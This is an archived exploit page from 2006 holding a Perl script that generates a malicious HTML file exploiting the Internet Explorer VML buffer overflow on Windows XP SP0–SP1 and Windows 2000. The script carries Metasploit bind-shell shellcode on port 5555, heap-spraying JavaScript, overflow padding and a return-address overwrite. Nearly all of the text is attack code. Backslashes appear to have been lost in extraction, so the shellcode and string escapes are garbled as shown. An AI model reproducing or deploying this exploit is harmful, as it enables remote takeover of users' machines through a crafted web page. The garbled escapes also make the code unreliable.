MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)
# Published : 2006-09-21
# Author : Trirat Puttaraksa
# Previous Title : MS Internet Explorer (VML) Remote Buffer Overflow Exploit (SP2) (pl)
# Next Title : MS Internet Explorer (VML) Remote Buffer Overflow Exploit
#!/usr/bin/perl
#
# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP0-SP1 +
# Windows 2000 SP4)
#
# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
# For educational purpose only
#
# Note: This exploit is modified from Shirkdog's PoC 
# (http://www.milw0rm.com/exploits/2400)
#
# I exploit the stack-based buffer overflow in the different manner because of 
# the problem of shellcode. I use heap spraying technique to injection my 
# shellcode in the heap. Because I can control EIP so I tell it to jump into 
# the heap that contains shellcode ^-^
#
# This exploit tested on: Windows XP SP1 + IE6 SP1 
# 			  Windows XP SP0 + IE6
#			  Windows 2000 SP4 + IE6 SP1
#			  Windows 2000 SP4 + IE6
#
# I will describe more implementation details at my blog in this weekend :)
#
# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2,
# This exploit is not success. The situation that overwrite to the location 
# that eax point to is not occured, so I cannot use my techqniue 
# "The Fake Cookie" that I use to break buffer overflow protection in 
# Windows Server 2003 SP0 to bypass it. If anybody can break this protection 
# with some techniques, plz share information :)
#

use strict;

# win32_bind LPORT = 5555 - Metasploit
my $shellcode =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45".
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49".
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d".
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66".
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61".
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40".
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32".
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6".
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09".
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0".
"x66x68x15xb3x66x53x89xe1x95x68xa4x1ax70xc7x57xff".
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53".
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff".
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64".
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89".
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab".
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51".
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53".
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6".
"x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0";

my $jscript =
"<script>n" .
"shellcode = unescape("" . convert_shellcode($shellcode) ."");n" .
"bigblock = unescape("%u9090%u9090");n" .
"headersize = 20;n" .
"slackspace = headersize+shellcode.length;n" .
"while (bigblock.length<slackspace) bigblock+=bigblock;n" .
"fillblock = bigblock.substring(0, slackspace);n" .
"block = bigblock.substring(0, bigblock.length-slackspace);n" .
"while(block.length+slackspace<0x40000) block = block+block+fillblock;n" .
"memory = new Array();n" .
"for (i=0;i<350;i++) memory[i] = block + shellcode;n" .
"</script>";

my $header =
"<html xmlns:v="urn:schemas-microsoft-com:vml">n" .
"<head>n" .
"<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">n" .
"</object>n" .
"<style>n" .
"v\:* { behavior: url(#VMLRender); }n" .
"</style>n" .
"</head>n" .
$jscript .
"<body>n" .
"<v:rect style='width:120pt;height:80pt' fillcolor="red">n" ;

my $footer =
"</v:rect>n" .
"</body>n" .
"</html>";


my $body1 = "<v:fill method="" ;
my $body2 = 
"" angle="-45"n" .
"focus="100%" focusposition=".5,.5" focussize="0,0"n" .
"type="gradientRadial" />n" .
"</v:rect>n" .
"</body>n" .
"</html>";

my $page = "xffxfe";	# magic number of M$ unicode file
my $c;

# header + body1 
foreach $c (split //, ($header . $body1)) {
	$page = $page . $c . "x00";
}

# padding + ret
$page = $page . "x41x00" x (256) . # padding
	"x01x0dx0dx0d" .	# writable memory
	"x44x44x44x44" . 	# padding
	"x0dx0dx0dx0d";	# return address

# body2 + footer
foreach $c (split //, ($body2 . $footer)) {
	$page = $page . $c . "x00";
}

open (IE_VML, ">", "exploit.html");

print IE_VML $page;

close IE_VML;

# This function copy from JSUnescape() code in Metasploit
sub convert_shellcode {
	my $data = shift;
	my $mode = shift() || 'LE';
	my $code = '';
	
	# Encode the shellcode via %u sequences for JS's unescape() function
	my $idx = 0;
	
	# Pad to an even number of bytes
	if (length($data) % 2 != 0) {
		$data .= substr($data, -1, 1);
	}
	
	while ($idx < length($data) - 1) {
		my $c1 = ord(substr($data, $idx, 1));
		my $c2 = ord(substr($data, $idx+1, 1));	
		if ($mode eq 'LE') {
			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
		} else {
			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
		}
		$idx += 2;
	}
	
	return $code;
}

# www.Syue.com [2006-09-21]